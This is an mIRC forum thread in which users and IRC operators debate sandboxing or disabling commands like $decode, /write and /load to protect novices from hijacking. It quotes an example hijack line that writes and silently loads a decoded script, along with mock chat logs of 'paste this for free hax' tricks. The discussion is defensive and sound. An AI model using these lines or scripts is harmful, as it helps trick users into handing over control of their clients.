mIRC Home    About    Download    Register    News    Help

Print Thread
Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
I think you might want to disable dangerous stuff from outside scripts so that people cannot be tricked into typing stuff that might hurt them. This I mean to notorious $decode lines. //write cms.mrc $decode(ctcp *:ins*:$2-) | .load -rs cms.mrc | .!msg hacker rq FREE BOUNCER

This is usually used to hijack mircs. If $decode, load and unload would not work from normal use, it would greatly reduce the problems posed by this type of hijacking.

You should consider preventing /play perform.ini or some other mirc vital file from working. Also I don't see why COM+ must work from IRC client.

The reason I am suggesting this all is to just protect users from malicious people. If you wish, you could also put a switch in configuration that is disabled per default to disallow "dangerous" commands and enabling it would cause a msg to be shown to the user.

Please consider these features, it would make ircing a better experience to many novice users.

Joined: Jan 2003
Posts: 3,012
Hoopy frood
Offline
Hoopy frood
Joined: Jan 2003
Posts: 3,012
Whether Khaled takes the time or not, another vicous URL will just appear. Khaled has already taken the neccisery steps to prevent a user from hurting themselves, or another. But the fact of the matter is the user themself has to take responsibilty also. I mean commands such as //$decode(...) do not work any more for this reason, such as links now have a confirmation box. At some point the user has to stop copying and pasting everything a user tells them to.

Additionally, the mIRC "Sandbox" idea has been discussed, to put such commands as /dll, /run, etc into their own enviornment out of "harms way" unless the user explicitly wants to run them. You may try using the search feature, expand to all forums and all dates, and search for "mirc sandbox".


-KingTomato
Joined: Dec 2002
Posts: 349
S
Fjord artisan
Offline
Fjord artisan
S
Joined: Dec 2002
Posts: 349
Quote:
This is usually used to hijack mircs. If $decode, load and unload would not work from normal use, it would greatly reduce the problems posed by this type of hijacking.


Uh.. why unload?

Joined: Apr 2003
Posts: 426
Fjord artisan
Offline
Fjord artisan
Joined: Apr 2003
Posts: 426
While your at it, why not disable write, writeini, /msg, /dcc, /raw, and so forth? There are so many commands in mIRC that can be used for malicious reasons.

I personally would prefer to see the lock lists expanded to include a comma seperated list of commands (minus the / obviously) that are locked.


--------
mIRC - fun for all the family (except grandma and grandpa)
Joined: Apr 2003
Posts: 210
S
Fjord artisan
Offline
Fjord artisan
S
Joined: Apr 2003
Posts: 210
Well, I'm all for the Sandbox idea, Or some form of disabling commands.

It means that in future we can add commands like /regwrite and $regread to mIRC, And add more powerful commands, Without them being oppossed because of potential security risks...

Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
seems that little more details are needed. I've been in QuakeNet staff for few years now, so I've seen what people tend to use to fool people. The MOST used tricks are:

a) http://lamer.domain.com/womannaked.jpg/index.html
b) //write cmz.mrc $decode(blablabla)...
c) Ask them to msg some detail to some wannabe service

While the a and c cannot be really fixed, the section b is fixable. The disabling of commands is not really required. Just prevent usage of those commands from channel/status window, that is, outside scripting area. I cannot see ANY reason for most scripting commands to work in the text typing area. Especially those dangerous ones.

What comes to sanboxed mIRC, yes I am all for it. Actually you could make two versions of mIRC; one without any inline scripting and one with. Or then make a config option to enable scripting in script file, enable scripting inline, and enable potentially dangerous commands such as 'write' or 'load'. Sure you can claim that why not disable msg as well, but I can see a use for 'msg'. I cannot see much use for write or load in text typing area. At least for most users.

Joined: Feb 2003
Posts: 810
C
Hoopy frood
Offline
Hoopy frood
C
Joined: Feb 2003
Posts: 810
No /load? /load is the most directed command by all readme files from decent scripts and addons out there.

I'd prefer a configurable list of commands and identifiers that you could choose whether to use them from the script, or the editboxes, or both options, of course having a predefined list. But don't include /load.


* cold edits his posts 24/7
Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
Ok. Maybe not /load. But at least /write.

Joined: Feb 2003
Posts: 307
T
Fjord artisan
Offline
Fjord artisan
T
Joined: Feb 2003
Posts: 307
And maybe /bwrite or /fwrite dah?

Maybe it is better to have something that doesn't allow people to load scripts unless they turn an option on where it says "yes i am a scripter i know what i am doing" or "yes i am responsible for some stupid things that i can get if i load malicious code"

Seems a bit better than turn off functions, which allow scripters to do amazing things.

Joined: Jun 2003
Posts: 5,024
M
Hoopy frood
Offline
Hoopy frood
M
Joined: Jun 2003
Posts: 5,024
As KG said, it's about time people got to grips with the Internet, and until they do, this stuff isn't going to stop. The lamers will find workarounds for everything, they'll find new ways to spam etc etc.

I think the sandbox idea is still the best, although even then, as so many people are ignorant to basic concepts, I should imagine this will cut down on about 2% of infections.

Unfortunately, this is such an expansive topic and could branch out into language barriers, the political correctness of that phrase, the dozens of other ways to possibly deal with it, different network's attitudes to spam, blah blah blah and so on, and these subjects are ones which people have such strong opinions about it's impossible to hold a logical debate..so I won't go there!

It's good however, that there are people like us who are at least trying to fight spam. Really great smile

Regards,


Mentality/Chris
Joined: Nov 2003
Posts: 2,327
T
Hoopy frood
Offline
Hoopy frood
T
Joined: Nov 2003
Posts: 2,327
whenever i make a new script, i type:
/write -c myscript.mrc - to save me renaming it later.
/load -rs myscript.mrc - to load it.
there are many reasons to type commands in the editbox.
it's not up to khaled to protect users, the user shouldn't type everything he's told to.


New username: hixxy
Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
On the other hand, you are experienced enough to enable the commands if they were disabled.

Joined: Jan 2003
Posts: 428
P
Fjord artisan
Offline
Fjord artisan
P
Joined: Jan 2003
Posts: 428
Quote:
As KG said, it's about time people got to grips with the Internet, and until they do, this stuff isn't going to stop.


Well yes, but that's been the cry for years... how would you suggest that it's done? (Even if all schools had the equipment and skills to teach it, you're looking at another decade before results become apparent).

PM


IRCnet & DALnet @#travelersinn
:-: IRC for fun and relaxation :-:
Joined: Jun 2003
Posts: 5,024
M
Hoopy frood
Offline
Hoopy frood
M
Joined: Jun 2003
Posts: 5,024
Well, it was a kinda rhetorical statement. Point is, people are not going to wise up.

And if the government(s) suddenly decide to put in more money into education to teach people about computers before the age of 16 (you can do computer science and IT etc at A-level, but generally not for GCSE or prior), then you know what they say, better late than never :P

It's pretty unlikely they'll do this though, but then again, that Novarg virus has probably shook them a little bit...if there's more viruses like that, perhaps it'll be a mixed blessing.

P.S. Sorry to non-UK people who probably have no idea of what GCSE's and A-Levels are.

Regards,


Mentality/Chris
Joined: Dec 2002
Posts: 3,127
P
Hoopy frood
Offline
Hoopy frood
P
Joined: Dec 2002
Posts: 3,127
general reply: there will always be ppl who will tell the unknowing "just disable that, np, really, it wont hurt" and those who will trust them. There is only so much that software can be expected to do, and some point at which ppl have to take on the job of educating themselves and acting like they have good sense.

One problem is that in spite of the widespread publication of the dangers of trojans/viruses, ppl seem to think it wont happen to them. Then when it does, they are cautious for a while, only to revert to oh i know them, i can trust them, it wont happen to me again. Odd how ppl will blindly follow a stranger on a puter, in spite of being told not to by the nightly news, but wouldnt IRL. Perhaps as was said, a lot of it has to do with being to some degree puter illiterate and some inherent inability to question the motives of someone who appears knowledgeable. There is little any programmer could do to stop that.

As a side note, puter use isnt limited to the young :tongue: Changes in todays school system would make a diff in a decade to future users, but you still have to take into consideration that for a several decades they will be the smaller % of users. For that matter, who do you think is creating all these backdoors/trojans etc to begin with? Bet the average age includes those who got more computer training in school <g>


ParaBrat @#mIRCAide DALnet
Joined: Nov 2003
Posts: 2,327
T
Hoopy frood
Offline
Hoopy frood
T
Joined: Nov 2003
Posts: 2,327
Quote:
(you can do computer science and IT etc at A-level, but generally not for GCSE or prior)

i'm doing QNVQICT (aqa examination board) and am in year 11.
:tongue:


New username: hixxy
Joined: Jan 2003
Posts: 3,012
Hoopy frood
Offline
Hoopy frood
Joined: Jan 2003
Posts: 3,012
While the a and c cannot be really fixed, the section b is fixable.

<someUser> For free hax, put this in your alias section (alt+a) for elite hax0rs: /freehax /write ..... then type /freehax

<diffUser> okay, now open remotes
<layman> ok
<diffUser> now paste this in:
<diffUser> alias freehax { /write ... }
<layman> ok
<diffUser> now type /freehax to egt freehax
* Quit: Layman (Quit: Ownd by diffUser)

I think i remember seeing..

"Make everything idiot proof, and we will just have smarter idiots" or something to the effect. Either that, or more persuasive victimizers.


-KingTomato
Joined: Jan 2003
Posts: 4
F
Self-satisified door
Offline
Self-satisified door
F
Joined: Jan 2003
Posts: 4
Greetings cmouse, nice to see you here smile

Anyway, regarding making mIRC more secure for newbies and/or idiots:
Yes, please God do something. The strength of it's scripting capabilities is also it's biggest weakness, if all the users could do with mIRC was chat we'd be fine but now we've got about (as everyone has already pointed out) a zillion different commands (write, writeini, run, load...) that all are potentionally dangerous and need to be n00bified. So do it, right now, and have a setting in the Options dialog to turn it on and off. A simple system comes to mind, probably imperfect, but that illustrates my point:

1) allow everything
2) allow dangerous commands through remote (for 3rd-party-scripts)
3) allow nothing (default)

A system such as this would drastically cut down on all the cut-n-paste exploits out there, including trojans that infect through other means of intrusion on the host and then propagate itself over mIRC. And I'm not talking about a measly "This command is potentionally dangerous! Do you still wish to run it?" because a twelve-year old who's just been told it will give him ops wont bother reading before clicking yes. I want a "This command has been disabled as a pre-caution to protect you from exploits. If you wish to enable it please go the Options dialog and enable it under the Advanced sub-section." where you just click ok. Dont make it easy for them to trip themselves.

People who are in need of these commands are familiar enough with mIRC to enable them or knows someone who will tell them where to do it. And yeah; people who arent in need of them will also do it, run some of these commands and trip and fall anyway. But, and this is the important part, most people will not. They will install mIRC, change nick and connect to their favourite network. No need to change any settings or go and mess with those complicated questions about remote scripting vulnerabilities, what the heck that is anyhow. Obfuscate the process as much as possible for novice and unfamiliar users to allow them to harm themselves.

I'm very thankful that Khaled has already taken the step to prevent //$decode from working, but this only underlines the need for further reviews of mIRC's powerful remote section vs. the misinformed. With mIRC being the obviously most popular client for irc available for Windows machines it is vital that we take every step to protect people from being exploited. Sure it's their fault but a) they dont care and wont change their ways and b) everyone gets to join in on the fun when he's part of a 10 000 botnet flood.

--
Faile
IRC Operator
ign.ie.quakenet.org

Joined: Jan 2003
Posts: 3,012
Hoopy frood
Offline
Hoopy frood
Joined: Jan 2003
Posts: 3,012
I'm not going to get in to how flawed your idea of a "near perfect" protection system is, just prove by example. You're idea is you stop the commands that are harmful, and all is well. Sorry, but it doesn't work that way. Something like:

<Loser> Hey! For free __watever__, cut and paste this into your text box: //$decode(SomeMadeUpHashBlah)

All that does is creates Losers more willing to participate in the commands, or more fulfulling directions.

<Loser> Hey! For free _watever_, go to your options __diections_to_enable_commands_ then type //$decode(SomeMadeUpHashBlah)

Apon being questioned, the Loser's defence "mIRC doesn't want you having access to these free _watever_".. Blah blah.

Again, for the final time--users have to start paying attention. "Make everything idiot proof, and we just have smarter idiots".


-KingTomato
Joined: Jan 2003
Posts: 4
F
Self-satisified door
Offline
Self-satisified door
F
Joined: Jan 2003
Posts: 4
Without getting into a shouting contest about who's wrong and who's right I would just like to state that I disagree. Some people will always fall for these things, in the same way that some are also using their hair-dryers in the bath or dont bother tying their shoelaces then fall down the stairs. But we can make it harder than it is right now for them to go and mess up. Without any proof or studies of any kind I personally belive that things that come off by default stay off unless the user isnt satisfied with it. Some wont be, and will turn it on only to get tricked but most wont bother with it. Of course all of this is highly hypotetical but this entire discussion is a classical Catch 22 anyway smile
We dont wanna let the users stab themselves but at the same time arent willing to take away the knifes from them. Apart from educating people there isnt anything else we can do, but I'm hopeful that some kind of "clueless user?"-protection will be included in future mIRC versions.

--
Faile
IRC Operator
ign.ie.quakenet.org


Link Copied to Clipboard